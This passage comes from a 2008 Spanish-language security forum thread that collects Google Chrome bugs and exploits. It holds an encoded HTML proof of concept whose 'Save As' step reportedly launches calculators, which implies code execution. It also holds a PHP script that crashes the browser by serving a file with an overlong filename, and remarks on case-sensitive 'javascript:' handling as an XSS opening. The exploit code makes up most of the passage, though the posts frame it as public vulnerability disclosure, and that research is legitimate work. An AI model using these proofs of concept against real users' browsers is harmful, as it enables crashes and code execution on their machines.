#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#37008;&#60166;&#2827;)&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#51505;&#59779;&#9332;&#23540;&#29569;&#60435;&#13869;&#33630;&#64747;&#62690;&#50448;&#24178;&#11756;&#7101;&#42704;&#23370;&#11412;&#54745;&#13731;&#445;&#11468;&#6109;&#6503;&#24509;&#7170;&#51190;&#43328;&#10998;&#60651;&#21500;&#61421;&#43741;&#31191;&#23058;&#51353;&#445;&#11464;&#14557;&#8551;&#54653;&#12723;&#46391;&#12647;&#24509;&#41991;&#31338;&#61160;&#40455;&#42632;&#28278;&#60777;&#21070;&#28007;&#54586;&#12700;&#54683;&#9604;&#22493;&#44391;&#24198;&#11756;&#14013;&#29392;&#43015;&#31628;&#42687;&#60783;&#3661;&#23228;&#17843;&#41134;&#9062;&#41313;&#19979;&#12887;&#11663;&#24118;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  22. </head>
  23. Click 'Save As' function for checking this vulnerability.
  24. Note: Opening multiple Calculators.
  25.  
  26. </body>
  27. </html>

Fuentes:
http://seclists.org/bugtraq/2008/Sep/0070.html
http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html
http://milw0rm.com/exploits/6367
4258  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 6 Septiembre 2008, 00:31 am
Por ahí escuché que Google Chrome no soporta RSS  :(

http://foro.elhacker.net/.xml.html;sa=news;board=34;limit=10;type=rss
4259  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 5 Septiembre 2008, 05:47 am
Citar
pd: Un detallito, cualquier navegador iria igual de limado que el chrome si por pestaña consumiese 20mb como me lo esta haciendo en este mismo momento :P

Mi firefox anda casi igual o mas rápido porque lo manejo en prioridad alta desde el administrador de tareas mientras hago mis trabajos y eso que todavía no se instalan plugines dentro del explorador de google porque ahi si va a pesar y va a tomar mas lentitud ya que si separa cada pestaña en un proceso diferente eso significa que debe iniciar el proceso de un plugin por cada pestaña adicional.

URL:
Citar
about:

Contenido:
Citar
Google Chrome
0.2.149.27 (1583)
Build oficial
Google Inc.
Copyright © 2006-2008 Google Inc. Todos los derechos reservados.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13

El explorador se basa en el motor de Safri y no es propio como un amigo me habia comentado.


El bug encontrado anteriormente ya fue expuesto en milw0rm con este link:
http://milw0rm.com/exploits/6365



Citar
javascript:Alert("test");
Citar
javascript:alert("test");
Ojo porque Google Chrome diferencia entre mayusculas y minusculas al momento de ejecutar javascript causando una grán incompatibilidad con algunos sitios webs que por costumbre inician la primera letra de sus funciones con mayusculas entre varios otros, pero no así en la declaración de la utilización de scripts:
Citar
javascript:alert("test");
Haciendo que sea incompatible para el buén funcionamiento y accesible para ataques de tipo XSS con escapes de case sensitive.


Talves esto sea la principal razón de la incompatibilidad con algunos sitios webs.
4260  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 5 Septiembre 2008, 00:58 am
encontré un bug un poco mas elegante  :P se trata de que cuando vizualizas una web este se cierra sin decirle nada  a nadie y sin dar avisos de error ni nada, simplemente se cierra y ya.

http://www.jccharry.com/pruebas/Google%20Chrome/2.php

 :xD Como vi que este descargaba todo sin pedir confirmación pensé en dar algún tipo de archivo que no pudiese ser guardado como un "con" o un archivo con mas de 255 caracteres y ahi va el exploit:

Código
  1. <?php
  2.  
  3. /*
  4. Google Chrome 0.2.149.27 (1583) Silent Crash PoC
  5. WHK - elhacker.net
  6. */
  7.  
  8. $nombre = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.psd';
  9. $contenido = 'prueba';
  10. header("Content-Type: application/octet-stream");
  11. header("Content-Disposition: attachment; filename=$nombre");
  12. print($contenido);
  13.  
  14. /*
  15. http://www.jccharry.com/pruebas/Google%20Chrome/2.php
  16. http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_bugsexploits_en_google_chrome_win32-t226450.0.html
  17. http://milw0rm.com/exploits/6365
  18. */
  19.  
  20. ?>
No se porqué pero al pegar la URL directamente en la barra de navegación no pasa nada pero cuando ingresas navegando entonces ahi si se cae con pestañas y todo.
http://www.jccharry.com/pruebas/Google%20Chrome/
Hagan click en 2.php

[editado]No cargaba al pegar la url por la codificación en urlencode"%20" pero el exploit funciona bién.[/editado]

Esto no ha sido publicado en ningún otro lugar  :-*
Páginas: 1 ... 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 [426] 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 ... 456
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines